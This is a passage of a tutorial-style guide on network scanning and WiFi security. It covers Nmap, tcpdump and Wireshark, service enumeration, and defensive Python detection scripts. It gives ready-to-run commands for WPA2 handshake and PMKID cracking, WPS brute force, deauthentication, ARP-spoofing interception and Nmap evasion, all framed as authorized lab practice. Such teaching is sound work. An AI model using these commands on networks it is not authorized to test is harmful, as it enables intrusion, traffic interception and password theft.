📡
// Cyber Security Series — Network //

Network Scanning & WiFi Security

Complete Guide (Bengali/English)

From understanding how networks work, to professional scanning with Nmap, packet analysis with Wireshark, and WiFi security assessment (WPA2, WPS vulnerabilities): everything here is for authorized lab environments.

root@kali:~# nmap -sV -A 192.168.1.0/24
Starting Nmap 7.94 ( https://nmap.org )
Nmap scan report for 192.168.1.1
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2
80/tcp open http Apache 2.4.41
// Table of Contents //
Network Scanning & WiFi Security — Complete Guide

01  Network Fundamentals: TCP/IP, OSI model, IP/MAC, ports, protocols (core concepts)
02  Network Discovery: ping, arp-scan, netdiscover (finding live hosts)
03  Nmap, Complete Guide: scan types, NSE scripts, OS detection, output formats
04  Packet Capture & Analysis: tcpdump, Wireshark (reading and analyzing network traffic)
05  Service Enumeration: SMB, FTP, SSH, HTTP, SNMP (extracting information from services)
06  WiFi Protocol & Security: 802.11, WEP, WPA, WPA2, WPA3 (how they work)
07  WiFi Reconnaissance: monitor mode, airodump-ng, kismet (wireless network scanning)
08  WPA2 Handshake Capture & Crack: aircrack-ng, hashcat (testing your own network)
09  WPS & Other WiFi Vulnerabilities: Reaver, Bully, PMKID attack, Evil Twin (introduction)
10  Network Attack Techniques: ARP spoofing, DNS spoofing, MITM (how they work)
11  Network & WiFi Defense: complete guide to securing your own network
12  Cheat Sheet, Complete Reference: Nmap, tcpdump, aircrack-ng, Wireshark filters (all commands)
CHAPTER 01
🌐 Network Fundamentals
TCP/IP, OSI model, IP addresses, ports: you need to understand networking before you scan it

OSI Model — 7 Layers

| Layer | Name         | Protocols            | Hacking Relevance          |
|-------|--------------|----------------------|----------------------------|
| 7     | Application  | HTTP, FTP, DNS, SSH  | Web attacks, SQLi, XSS     |
| 6     | Presentation | SSL/TLS, JPEG, ASCII | SSL stripping              |
| 5     | Session      | NetBIOS, RPC         | Session hijacking          |
| 4     | Transport    | TCP, UDP             | Port scanning, DoS         |
| 3     | Network      | IP, ICMP, OSPF       | IP spoofing, routing       |
| 2     | Data Link    | Ethernet, ARP, MAC   | ARP spoofing, MITM         |
| 1     | Physical     | Cable, WiFi, Fiber   | Physical tap, WiFi attacks |

TCP vs UDP

TCP — Reliable

Establishes a connection with a 3-way handshake (SYN → SYN-ACK → ACK) and guarantees delivery of every segment. Used by HTTP, SSH, FTP.

Client ──SYN──►     Server
Client ◄─SYN-ACK─   Server
Client ──ACK──►     Server
Connection established!

UDP — Fast but Unreliable

No handshake: datagrams are sent directly, and the sender never learns whether a packet was lost. Used by DNS, DHCP, video streaming.

Client ──DATA──► Server
Client ──DATA──► Server
(No acknowledgment)

IP Addressing & Subnetting

# IP address classes
Class A: 1.0.0.0 – 126.255.255.255     (large networks)
Class B: 128.0.0.0 – 191.255.255.255   (medium networks)
Class C: 192.0.0.0 – 223.255.255.255   (small networks)

# Private IP ranges (used on LANs)
10.0.0.0 – 10.255.255.255        (10.0.0.0/8)
172.16.0.0 – 172.31.255.255      (172.16.0.0/12)
192.168.0.0 – 192.168.255.255    (192.168.0.0/16)

# CIDR notation
192.168.1.0/24 → 256 IPs (192.168.1.0 – 192.168.1.255)
192.168.1.0/25 → 128 IPs
10.0.0.0/8     → 16M+ IPs

# Getting network info
$ ip addr show            # Linux IP info
$ ip route                # Routing table
$ cat /etc/resolv.conf    # DNS servers
$ arp -n                  # ARP table
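The CIDR arithmetic above, worked through in code. This is an added example, not part of the original guide: it uses Python's standard-library ipaddress module to summarize a block (size, usable host range, private or public), label an address by class as in the table, and check that hosts found by a scan actually fall inside the range you were authorized to test. The private ranges are the ones listed above; the other addresses and the authorized-scope list are constructed sample values.

```python
# Added example (not from the original guide): CIDR arithmetic and scan-scope
# checks with Python's standard-library ipaddress module. The private ranges are
# the ones listed above; every other address and scope below is constructed.
import ipaddress

PRIVATE_RANGES = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
]


def subnet_summary(cidr):
    """Size, usable host range and private/public status of a CIDR block."""
    net = ipaddress.ip_network(cidr, strict=False)
    if net.num_addresses > 2:
        # Network and broadcast addresses are not assignable to hosts.
        first, last = net.network_address + 1, net.broadcast_address - 1
        usable = net.num_addresses - 2
    else:
        # /31 and /32: every address is usable (RFC 3021 point-to-point links).
        first, last, usable = net.network_address, net.broadcast_address, net.num_addresses
    return {
        "network": str(net),
        "num_addresses": net.num_addresses,
        "usable_hosts": usable,
        "first_host": str(first),
        "last_host": str(last),
        "private": any(net.subnet_of(r) for r in PRIVATE_RANGES),
    }


def ip_class(ip):
    """Classful label (A/B/C) from the first octet, as in the table above."""
    first_octet = int(ipaddress.ip_address(ip)) >> 24
    if 1 <= first_octet <= 126:
        return "A"
    if 128 <= first_octet <= 191:
        return "B"
    if 192 <= first_octet <= 223:
        return "C"
    return "other"   # 0/8, 127/8 loopback, class D multicast, class E reserved


def out_of_scope(discovered, authorized_cidrs):
    """Hosts found by a scan that lie outside the authorized ranges (sorted)."""
    scope = [ipaddress.ip_network(c, strict=False) for c in authorized_cidrs]
    return sorted(
        ip for ip in discovered
        if not any(ipaddress.ip_address(ip) in net for net in scope)
    )


if __name__ == "__main__":
    print(subnet_summary("192.168.1.0/25"))
    print(ip_class("172.16.5.1"))
    # Constructed discovery result checked against a constructed authorization scope
    print(out_of_scope(["192.168.1.5", "192.168.2.9", "10.0.0.3"], ["192.168.1.0/24"]))
```

The out_of_scope check is worth running on every host list before you enumerate anything: a typo in the CIDR you hand to nmap turns an authorized lab scan into an unauthorized one.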

Important Ports to Remember

Common Services

  • 21 → FTP
  • 22 → SSH
  • 23 → Telnet
  • 25 → SMTP
  • 53 → DNS
  • 80 → HTTP
  • 443 → HTTPS

Database Services

  • 1433 → MSSQL
  • 1521 → Oracle
  • 3306 → MySQL
  • 5432 → PostgreSQL
  • 6379 → Redis
  • 27017 → MongoDB

Windows/AD

  • 88 → Kerberos
  • 135 → RPC
  • 139 → NetBIOS
  • 389 → LDAP
  • 445 → SMB
  • 3389 → RDP
  • 5985 → WinRM
CHAPTER 02
🔦 Network Discovery — Finding Live Hosts
Techniques for finding which devices are active on the network

ICMP Ping — The Simplest Method

# Single host ping
$ ping 192.168.1.1
$ ping -c 4 192.168.1.1        # Send 4 packets
$ ping -i 0.2 192.168.1.1      # Fast ping

# Ping sweep with a bash loop
$ for i in {1..254}; do ping -c 1 -W 1 192.168.1.$i | grep "bytes from" & done

# fping: many hosts at once
$ fping -a -g 192.168.1.0/24 2>/dev/null   # Alive hosts only
$ fping -a -g 10.0.0.0/24 -r 1             # 1 retry

ARP Scan — Most Reliable on the Local Network

# arp-scan
$ arp-scan --localnet
$ arp-scan -I eth0 192.168.1.0/24
$ arp-scan --localnet | grep -v "DUP\|Unknown"

# netdiscover
$ netdiscover -r 192.168.1.0/24
$ netdiscover -i eth0 -r 192.168.1.0/24 -p    # Passive mode (lowercase -p; uppercase -P is parse-friendly output)

# arping
$ arping -c 3 192.168.1.1

# Host discovery with Nmap (no port scan)
$ nmap -sn 192.168.1.0/24        # Ping scan only
$ nmap -sn -PR 192.168.1.0/24    # ARP ping
$ nmap -sP 192.168.1.0/24        # Same as -sn (older syntax)

Network Information Gathering

# DNS lookup
$ nslookup target.com
$ dig target.com A
$ dig target.com MX
$ dig -x 192.168.1.1         # Reverse DNS
$ host target.com

# Traceroute: see the network path
$ traceroute target.com
$ traceroute -T target.com   # TCP traceroute
$ mtr target.com             # Live traceroute

# Network interfaces
$ ip link show
$ ifconfig -a
$ ip neigh show              # ARP cache (neighbors)
CHAPTER 03
🗺️ Nmap — Complete Guide
Network Mapper: the world's most widely used port scanner, in full detail

Nmap Scan Types

| Flag | Scan Type   | How it Works                                                   | When to Use        |
|------|-------------|----------------------------------------------------------------|--------------------|
| -sS  | SYN Stealth | Sends SYN; on SYN-ACK replies with RST, never completing the handshake | Default (as root) |
| -sT  | TCP Connect | Full 3-way handshake                                           | Non-root user      |
| -sU  | UDP Scan    | Sends UDP packets                                              | DNS, SNMP, DHCP    |
| -sA  | ACK Scan    | Maps firewall rules (filtered vs unfiltered)                   | Firewall mapping   |
| -sN  | NULL Scan   | No TCP flags set                                               | IDS evasion        |
| -sn  | Ping Scan   | Host discovery without a port scan                             | Quick discovery    |

Nmap Complete Usage

# ── TARGET SPECIFICATION ──
$ nmap 192.168.1.1              # Single IP
$ nmap 192.168.1.1-254          # IP range
$ nmap 192.168.1.0/24           # CIDR
$ nmap -iL targets.txt          # From a file
$ nmap target.com               # Domain

# ── PORT SPECIFICATION ──
$ nmap -p 80 IP                 # Single port
$ nmap -p 80,443,8080 IP        # Multiple ports
$ nmap -p 1-1000 IP             # Port range
$ nmap -p- IP                   # All 65535 ports
$ nmap --top-ports 100 IP       # Top 100 common ports

# ── SERVICE & OS DETECTION ──
$ nmap -sV IP                           # Service version
$ nmap -sV --version-intensity 9 IP     # Aggressive version probing
$ nmap -O IP                            # OS detection
$ nmap -A IP                            # All: OS + version + scripts + traceroute

# ── TIMING TEMPLATES ──
$ nmap -T0 IP    # Paranoid (IDS evasion)
$ nmap -T1 IP    # Sneaky
$ nmap -T2 IP    # Polite
$ nmap -T3 IP    # Normal (default)
$ nmap -T4 IP    # Aggressive (fast)
$ nmap -T5 IP    # Insane (fastest)

# ── OUTPUT ──
$ nmap -oN output.txt IP      # Normal text
$ nmap -oX output.xml IP      # XML
$ nmap -oG output.gnmap IP    # Grepable
$ nmap -oA output IP          # All 3 formats
$ nmap -v IP                  # Verbose
$ nmap -vv IP                 # More verbose

NSE Scripts — The Most Powerful Feature

# Script categories
$ nmap --script vuln IP          # Vulnerability scan
$ nmap --script safe IP          # Safe scripts
$ nmap --script default IP       # Default scripts
$ nmap --script discovery IP     # Discovery

# Specific scripts
$ nmap --script http-enum IP             # Web directory enum
$ nmap --script http-title IP            # Web page title
$ nmap --script "smb-vuln-*" IP          # SMB vulnerabilities (quote the wildcard so the shell does not expand it)
$ nmap --script smb-enum-shares IP       # SMB shares
$ nmap --script ftp-anon IP              # Anonymous FTP
$ nmap --script ssh-hostkey IP           # SSH host key
$ nmap --script dns-zone-transfer IP     # DNS zone transfer
$ nmap --script ssl-cert IP              # SSL certificate info
$ nmap --script banner IP                # Service banners

# Evasion techniques
$ nmap -D RND:10 IP              # Decoy scan
$ nmap -f IP                     # Fragment packets
$ nmap --source-port 53 IP       # Source port spoof
$ nmap --data-length 200 IP      # Append random data
$ nmap --randomize-hosts IP      # Random host order

Practical Scan Examples

# Quick network survey
$ nmap -sn 192.168.1.0/24 -oN hosts.txt

# Comprehensive single-target scan
$ nmap -sV -sC -O -p- --min-rate=1000 -T4 TARGET_IP -oA full_scan

# Fast top-ports scan
$ nmap -sV --top-ports 1000 -T4 TARGET_IP

# Vulnerability assessment
$ nmap -sV --script vuln TARGET_IP

# EternalBlue check (MS17-010)
$ nmap --script smb-vuln-ms17-010 -p 445 TARGET_IP

# Web application discovery
$ nmap -p 80,443,8080,8443 --script http-enum,http-title,http-methods TARGET_IP
CHAPTER 04
📦 Packet Capture & Analysis
Viewing and analyzing network traffic with tcpdump and Wireshark

tcpdump — Command Line Packet Capture

# Basic capture
$ tcpdump -i eth0                     # Capture on eth0
$ tcpdump -i any                      # All interfaces
$ tcpdump -i eth0 -w capture.pcap     # Save to file
$ tcpdump -r capture.pcap             # Read a file
$ tcpdump -i eth0 -c 100              # Capture 100 packets
$ tcpdump -i eth0 -n                  # No DNS resolution

# Filters
$ tcpdump -i eth0 host 192.168.1.1    # Specific IP
$ tcpdump -i eth0 port 80             # Specific port
$ tcpdump -i eth0 tcp                 # TCP only
$ tcpdump -i eth0 udp                 # UDP only
$ tcpdump -i eth0 icmp                # ICMP only
$ tcpdump -i eth0 'port 80 and host 192.168.1.1'

# Security-specific captures
$ tcpdump -i eth0 -A port 80                      # HTTP content (ASCII)
$ tcpdump -i eth0 -A 'port 21'                    # FTP credentials!
$ tcpdump -i eth0 -A 'port 23'                    # Telnet credentials!
$ tcpdump -i eth0 'tcp[tcpflags] = tcp-syn'       # Detect SYN scans (bare SYN, no other flags)
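The last filter above isolates bare SYN packets; what turns them into a detection is counting how many distinct ports one source probes without ever completing a handshake. The script below is an added example, not from the original guide: it parses lines in the layout of tcpdump -n output and reports sources with many half-open targets. The capture lines are constructed sample data (a scanner at 10.0.0.5 probing twelve ports, a normal client at 10.0.0.7 opening one connection), not a real trace.

```python
# Added example (not from the original guide): SYN-scan detection over
# tcpdump -n style lines. All lines below are constructed sample data.
import re
from collections import defaultdict

SCAN_PORTS = [21, 22, 23, 25, 53, 80, 110, 135, 139, 443, 445, 3389]

# Constructed: 10.0.0.5 sends a bare SYN to each port on 192.168.1.10, gets one
# SYN-ACK back and answers it with RST (the -sS pattern). 10.0.0.7 makes a
# normal connection to 443: SYN, SYN-ACK, ACK, then data.
SAMPLE_LINES = [
    f"12:00:01.{i:06d} IP 10.0.0.5.4{i:04d} > 192.168.1.10.{p}: Flags [S], seq 1, win 1024, length 0"
    for i, p in enumerate(SCAN_PORTS)
] + [
    "12:00:01.000100 IP 192.168.1.10.22 > 10.0.0.5.40001: Flags [S.], seq 7, ack 2, win 64240, length 0",
    "12:00:01.000101 IP 10.0.0.5.40001 > 192.168.1.10.22: Flags [R], seq 2, win 0, length 0",
    "12:00:02.000000 IP 10.0.0.7.51000 > 192.168.1.10.443: Flags [S], seq 9, win 64240, length 0",
    "12:00:02.000050 IP 192.168.1.10.443 > 10.0.0.7.51000: Flags [S.], seq 3, ack 10, win 64240, length 0",
    "12:00:02.000100 IP 10.0.0.7.51000 > 192.168.1.10.443: Flags [.], ack 4, win 64240, length 0",
    "12:00:02.000200 IP 10.0.0.7.51000 > 192.168.1.10.443: Flags [P.], seq 10:527, ack 4, win 64240, length 517",
]

LINE_RE = re.compile(
    r"IP (?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+) > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+): Flags \[(?P<flags>[A-Z.]+)\]"
)


def parse_line(line):
    """Return (src, dst, dst_port, flags) for a TCP line, or None otherwise."""
    m = LINE_RE.search(line)
    if not m:
        return None
    d = m.groupdict()
    return d["src"], d["dst"], int(d["dport"]), d["flags"]


def half_open_targets(lines):
    """Per source IP: (dst, port) pairs that received a bare SYN but never an
    ACK from that same source, i.e. handshakes the source never finished."""
    syn = defaultdict(set)
    ack = defaultdict(set)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        src, dst, dport, flags = parsed
        if flags == "S":                                   # bare SYN only
            syn[src].add((dst, dport))
        elif "." in flags and "S" not in flags and "R" not in flags:
            ack[src].add((dst, dport))                     # ACK / PSH-ACK etc.
    return {src: targets - ack[src] for src, targets in syn.items()}


def detect_syn_scanners(lines, threshold=10):
    """Sources with at least `threshold` half-open targets, sorted."""
    return sorted(src for src, targets in half_open_targets(lines).items()
                  if len(targets) >= threshold)


if __name__ == "__main__":
    for src, targets in half_open_targets(SAMPLE_LINES).items():
        print(src, "half-open targets:", len(targets))
    print("suspected scanners:", detect_syn_scanners(SAMPLE_LINES))
```

The threshold is a tuning knob: a busy web client legitimately opens a handful of connections, but no normal host sends bare SYNs to a dozen ports on one machine and completes none of them. Feed it the output of tcpdump -n -r capture.pcap to run it over a saved capture.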

Wireshark — GUI Packet Analyzer

# Wireshark display filters (type these into the filter bar in the GUI)

# Protocol filters
http                                  # HTTP traffic
dns                                   # DNS queries
ftp                                   # FTP
ssh                                   # SSH
tcp                                   # All TCP
udp                                   # All UDP
icmp                                  # ICMP/ping
arp                                   # ARP packets

# IP filters
ip.addr == 192.168.1.1                # Specific IP
ip.src == 192.168.1.100               # Source IP
ip.dst == 192.168.1.1                 # Destination IP

# Port filters
tcp.port == 80                        # TCP port 80
tcp.dstport == 443                    # HTTPS
tcp.flags.syn == 1                    # SYN packets
tcp.flags.reset == 1                  # RST (closed port)

# Content filters
http.request.method == "POST"         # POST requests
http contains "password"              # "password" in HTTP
dns.qry.name contains "google"        # DNS query

# Combined
http.request and ip.src == 192.168.1.5
tcp.port == 80 and ip.addr == 10.0.0.1

💡 Finding Credentials with Wireshark

HTTP, FTP, and Telnet send credentials in plaintext. The filter http.request.method == "POST" in Wireshark shows login form submissions. This is exactly why you should use HTTPS, SFTP, and SSH.

CHAPTER 05
🔎 Service Enumeration
After finding open ports: how to extract information from each service

SMB Enumeration (Port 445)

$ enum4linux -a TARGET_IP
$ enum4linux-ng -A TARGET_IP
$ smbclient -L //TARGET_IP -N              # Share list (anonymous)
$ smbclient -L //TARGET_IP -U user         # With credentials
$ smbclient //TARGET_IP/share -N           # Connect to a share
$ smbmap -H TARGET_IP
$ smbmap -H TARGET_IP -u user -p pass

# Nmap SMB scripts
$ nmap --script smb-enum-shares,smb-enum-users,smb-os-discovery -p 445 TARGET_IP
$ nmap --script smb-vuln-ms17-010 -p 445 TARGET_IP    # EternalBlue

HTTP/HTTPS Enumeration (Port 80/443)

# Technology detection
$ whatweb http://TARGET_IP
$ wafw00f http://TARGET_IP         # WAF detection
$ curl -I http://TARGET_IP         # HTTP headers

# Directory brute force
$ gobuster dir -u http://TARGET_IP -w /usr/share/wordlists/dirb/common.txt
$ gobuster dir -u http://TARGET_IP -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
$ ffuf -w wordlist.txt -u http://TARGET_IP/FUZZ -mc 200,301,302

# Web vulnerability scanner
$ nikto -h http://TARGET_IP

SSH, FTP, SNMP Enumeration

# SSH (port 22)
$ ssh-audit TARGET_IP                          # Algorithm & weakness check
$ nmap --script ssh-hostkey -p 22 TARGET_IP

# FTP (port 21): anonymous login check
$ ftp TARGET_IP                                # Username: anonymous, Password: (blank or an email)
$ nmap --script ftp-anon,ftp-bounce -p 21 TARGET_IP

# SNMP (port 161/UDP)
$ snmpwalk -c public -v1 TARGET_IP
$ snmpwalk -c public -v2c TARGET_IP
$ onesixtyone -c community.txt TARGET_IP
$ nmap -sU -p 161 --script snmp-info TARGET_IP
CHAPTER 06
📶 WiFi Protocol & Security Standards
802.11, WEP, WPA, WPA2, WPA3: how WiFi works and which weaknesses each standard has

WiFi Security Evolution

| Standard | Year | Encryption      | Security | Vulnerability                 |
|----------|------|-----------------|----------|-------------------------------|
| WEP      | 1997 | RC4             | BROKEN   | Cracked in minutes            |
| WPA      | 2003 | TKIP            | WEAK     | TKIP vulnerabilities          |
| WPA2     | 2004 | AES-CCMP        | MEDIUM   | Weak passwords, PMKID, KRACK  |
| WPA3     | 2018 | SAE (Dragonfly) | STRONG   | Dragonblood (patched)         |

WPA2 Authentication — How Does It Work?

WPA2 4-Way Handshake:

   Client (Station)                        Access Point (AP)
        │                                         │
        │◄──── Message 1: ANonce ─────────────────│
        │      (AP sends a random number)         │
        │                                         │
        │──── Message 2: SNonce + MIC ───────────►│
        │      (Client sends its random + hash)   │
        │                                         │
        │◄──── Message 3: GTK + MIC ──────────────│
        │      (AP confirms the session key)      │
        │                                         │
        │──── Message 4: ACK ────────────────────►│
        │      (Client confirms)                  │
        │                                         │
        └══════ Encrypted Communication ══════════┘

Attacker: capturing Message 2 is enough for an offline crack!
Password hash = PBKDF2(password, SSID, 4096 iterations)

WiFi Bands & Channels

2.4 GHz Band

  • Channels 1, 6, 11 do not overlap
  • Longer range but slower
  • Penetrates walls
  • 802.11b/g/n

5 GHz Band

  • 23 non-overlapping channels
  • Faster but shorter range
  • Less interference
  • 802.11a/n/ac/ax
CHAPTER 07
🔭 WiFi Reconnaissance
Wireless network scanning with monitor mode and airodump-ng: techniques for seeing everything on the air
⚖️ Legal Warning

WiFi scanning must only be done on your own network or with written permission. Unauthorized access to someone else's WiFi is a crime under Bangladesh's Digital Security Act and under international law. Do all practice in your own home lab or on a dedicated test network.

Enabling Monitor Mode

# Compatible adapter check
$ iwconfig                                              # List wireless interfaces
$ iw list | grep "Supported interface modes" -A 10      # Monitor mode support

# Method 1: airmon-ng (recommended)
$ airmon-ng check kill          # Stop interfering processes
$ airmon-ng start wlan0         # Enable monitor mode
# Interface: wlan0 → wlan0mon
$ airmon-ng stop wlan0mon       # Disable monitor mode

# Method 2: iw command
$ ip link set wlan0 down
$ iw dev wlan0 set type monitor
$ ip link set wlan0 up

# Verify monitor mode
$ iwconfig wlan0mon

airodump-ng — Wireless Network Scanner

# Basic scan: show all networks
$ airodump-ng wlan0mon

# Output explanation:
# BSSID   = AP's MAC address
# PWR     = Signal strength (higher = closer)
# Beacons = Broadcast count
# #Data   = Data frames
# CH      = Channel
# ENC     = Encryption type
# CIPHER  = Cipher (CCMP, TKIP)
# AUTH    = Authentication (PSK, MGT)
# ESSID   = Network name

# Focus on a specific network
$ airodump-ng wlan0mon --bssid AP_MAC --channel 6

# Capture packets to a file
$ airodump-ng wlan0mon --bssid AP_MAC --channel 6 -w capture

# 5 GHz band
$ airodump-ng wlan0mon --band a
$ airodump-ng wlan0mon --band abg    # Both bands

# Kismet: advanced wireless scanner
$ kismet -c wlan0mon
CHAPTER 08
🔐 WPA2 Handshake Capture & Crack
Testing the password strength of your own WPA2 network (authorized testing only)
⚠️ Your Own Network Only!

Everything in this chapter is only for testing your own WiFi or a dedicated lab. It shows why your router needs a strong password.

Capturing the Handshake

# Step 1: Enable monitor mode
$ airmon-ng check kill
$ airmon-ng start wlan0

# Step 2: Find the target network
$ airodump-ng wlan0mon
# Note: BSSID (AP MAC), channel, ESSID

# Step 3: Start capturing on that channel
$ airodump-ng --bssid TARGET_BSSID --channel TARGET_CH -w handshake wlan0mon

# Step 4: (in another terminal) Deauth so a client reconnects
$ aireplay-ng --deauth 10 -a TARGET_BSSID wlan0mon
# --deauth 10 = send 10 deauth packets
# When the window above shows "WPA handshake: XX:XX:XX", it worked!

# Verify the handshake
$ aircrack-ng handshake-01.cap

Cracking with Aircrack-ng

# Dictionary attack
$ aircrack-ng handshake-01.cap -w /usr/share/wordlists/rockyou.txt
$ aircrack-ng handshake-01.cap -w custom_wordlist.txt -e ESSID

# With hashcat (much faster, uses the GPU)
# Step 1: convert .cap → .hc22000
$ hcxpcapngtool handshake-01.cap -o hash.hc22000
# or capture directly:
$ hcxdumptool -i wlan0mon -o capture.pcapng --enable_status=1

# Step 2: crack with hashcat
$ hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt
$ hashcat -m 22000 hash.hc22000 rockyou.txt -r best64.rule
$ hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d    # 8-digit numbers

# PMKID attack (no client needed!)
$ hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1 --filtermode=2
$ hcxpcapngtool pmkid.pcapng -o hash.hc22000
$ hashcat -m 22000 hash.hc22000 rockyou.txt

// How Long Does It Take to Crack a Password? //

  • 🔴 "password", "12345678", "bangladesh" → within minutes
  • 🟡 Dictionary word + numbers (admin123) → within hours
  • 🟢 Random 12+ characters (K#9mP@2Lq!v) → years, or never
  • 💡 Use WPA3: it prevents offline cracking
CHAPTER 09
📌 WPS & Other WiFi Vulnerabilities
WPS PIN attack, Pixie Dust, Evil Twin: an introduction to WiFi's other weaknesses

WPS — WiFi Protected Setup Vulnerability

WPS is a router feature meant to make connecting easy. But its 8-digit PIN scheme has a fundamental design flaw: it can be cracked by trying only 11,000 combinations.

# Finding WPS-enabled networks
$ wash -i wlan0mon                 # Scan for WPS-enabled APs
$ airodump-ng wlan0mon --wps       # Show WPS info

# Reaver: WPS PIN brute force (test on your own router)
$ reaver -i wlan0mon -b TARGET_BSSID -vv
$ reaver -i wlan0mon -b TARGET_BSSID -vv -N    # No association

# Pixie Dust attack: much faster (seconds)
$ reaver -i wlan0mon -b TARGET_BSSID -vv -K 1
$ bully wlan0mon -b TARGET_BSSID -d -v 3

Evil Twin Attack — How It Works (Theory)

Evil Twin attack flow:
1. The attacker creates a fake AP with the same SSID as the target AP
2. The attacker sends a deauth attack against the real AP
3. The victim disconnects and connects to the fake AP
4. The fake AP shows a captive portal: "Please re-enter your WiFi password"
5. The victim types the password → the attacker has it

Tools: airbase-ng, hostapd-wpe, wifiphisher
Note: this is social engineering, not a technical bypass

🔍 How to Protect Against Evil Twin
  • Use a VPN, always, on public WiFi
  • Use HTTPS-only sites
  • Never enter passwords on unknown networks
  • Use WPA3 Enterprise (certificate validation)
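On your own network, the defensive counterpart to the Evil Twin flow is simply watching for it: a second BSSID broadcasting your ESSID is the signature. The script below is an added example, not from the original guide. It reads the CSV that the Chapter 07 command airodump-ng -w capture writes, flags APs advertising one of your ESSIDs from a BSSID that is not yours, and lists networks still running WEP or no encryption. The column layout follows airodump-ng's CSV header; the rows, ESSIDs, BSSIDs and the KNOWN_APS baseline are constructed sample data.

```python
# Added example (not from the original guide): rogue-AP and weak-encryption
# checks over an airodump-ng CSV. Header layout as airodump-ng writes it;
# all rows and the KNOWN_APS baseline are constructed sample data.
import csv
import io

# Constructed baseline: the ESSIDs we own and the BSSIDs of our real APs.
KNOWN_APS = {"HomeNet": {"aa:bb:cc:dd:ee:01"}}

SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:DD:EE:01, 2024-01-01 12:00:00, 2024-01-01 12:05:00,  6,  54, WPA2, CCMP, PSK, -40, 120, 0,   0.  0.  0.  0,  7, HomeNet, 
DE:AD:BE:EF:00:02, 2024-01-01 12:03:00, 2024-01-01 12:05:00,  6,  54, WPA2, CCMP, PSK, -35,  60, 0,   0.  0.  0.  0,  7, HomeNet, 
11:22:33:44:55:66, 2024-01-01 12:00:00, 2024-01-01 12:05:00, 11,  54, WEP, WEP, , -70,  40, 0,   0.  0.  0.  0,  6, OldCam, 
77:88:99:AA:BB:CC, 2024-01-01 12:00:00, 2024-01-01 12:05:00,  1,  54, OPN, , , -80,  30, 0,   0.  0.  0.  0,  5, Cafe, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
"""


def parse_airodump_csv(text):
    """Return the AP section of an airodump-ng CSV as a list of dicts."""
    reader = csv.reader(io.StringIO(text), skipinitialspace=True)
    header = None
    aps = []
    for row in reader:
        if not row or row[0] == "Station MAC":
            break                      # blank line / station table: AP section is over
        if header is None:
            header = row               # first line is the column header
            continue
        rec = dict(zip(header, row))
        aps.append({
            "bssid": rec["BSSID"].lower(),
            "channel": int(rec["channel"]),
            "privacy": rec["Privacy"].strip(),
            "essid": rec["ESSID"].strip(),
        })
    return aps


def find_rogue_aps(aps, known=KNOWN_APS):
    """BSSIDs advertising one of our ESSIDs that are not one of our own APs."""
    return sorted(ap["bssid"] for ap in aps
                  if ap["essid"] in known and ap["bssid"] not in known[ap["essid"]])


def find_weak_aps(aps):
    """ESSID -> privacy field for networks on WEP or with no encryption (OPN)."""
    return {ap["essid"]: ap["privacy"] for ap in aps
            if ap["privacy"] in ("WEP", "OPN")}


if __name__ == "__main__":
    aps = parse_airodump_csv(SAMPLE_CSV)
    print("rogue APs using our ESSID:", find_rogue_aps(aps))
    print("weak networks:", find_weak_aps(aps))
```

Run it periodically against the latest capture-NN.csv and alert on any new entry in the rogue list; the stronger signal (PWR -35 against your own -40 in the sample) is typical, since the fake AP is usually placed close to its victims.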
CHAPTER 10
Network Attack Techniques
ARP spoofing, DNS spoofing, MITM: how they work and how to protect yourself

ARP Spoofing — The Foundation of MITM

Normal ARP:
  PC (192.168.1.5) → "Who has the router's MAC?" → Router answers

ARP Spoofing:
  Attacker → PC:     "I am the router (192.168.1.1)! My MAC: AA:BB:CC"
  Attacker → Router: "I am the PC (192.168.1.5)! My MAC: AA:BB:CC"
  PC → (sends to the attacker, thinking it is the router) → Router
  All traffic passes through the attacker!

Tools: arpspoof, bettercap, ettercap

# ARP spoofing (test in your own lab)
$ echo 1 > /proc/sys/net/ipv4/ip_forward     # Enable forwarding
$ arpspoof -i eth0 -t VICTIM_IP GATEWAY_IP
$ arpspoof -i eth0 -t GATEWAY_IP VICTIM_IP

# Bettercap: modern MITM framework
$ bettercap -iface eth0
» net.probe on
» set arp.spoof.targets VICTIM_IP
» arp.spoof on
» net.sniff on

# Detecting ARP spoofing
$ arp -n       # Look for duplicate MAC addresses
$ arpwatch     # Monitor ARP changes
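The two detection commands above are easy to automate. The script below is an added example, not from the original guide: it parses output in the layout of arp -n and flags the two symptoms the text describes, one MAC claiming several IPs and the gateway's MAC differing from a known-good baseline. The ARP table, the gateway address and the baseline MAC are constructed sample values, not a real capture.

```python
# Added example (not from the original guide): detect ARP spoofing symptoms in
# "arp -n" output. The table, gateway IP and baseline MAC are constructed.
import re
from collections import defaultdict

SAMPLE_ARP = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.1.1              ether   de:ad:be:ef:00:99   C                     eth0
192.168.1.5              ether   de:ad:be:ef:00:99   C                     eth0
192.168.1.7              ether   00:11:22:33:44:07   C                     eth0
192.168.1.9                      (incomplete)                              eth0
"""

# Constructed baseline: the gateway's real MAC, recorded once on a known-clean
# network (or pinned with "arp -s", as Chapter 11 recommends).
GATEWAY_IP = "192.168.1.1"
GATEWAY_MAC = "aa:bb:cc:dd:ee:01"

ENTRY_RE = re.compile(
    r"^(\d+\.\d+\.\d+\.\d+)\s+ether\s+([0-9a-f]{2}(?::[0-9a-f]{2}){5})", re.I
)


def parse_arp_table(text):
    """Map IP -> MAC (lower-case) for complete entries of `arp -n` output."""
    table = {}
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:                       # header and "(incomplete)" rows do not match
            table[m.group(1)] = m.group(2).lower()
    return table


def duplicate_macs(table):
    """MACs that appear for more than one IP -> sorted list of those IPs."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
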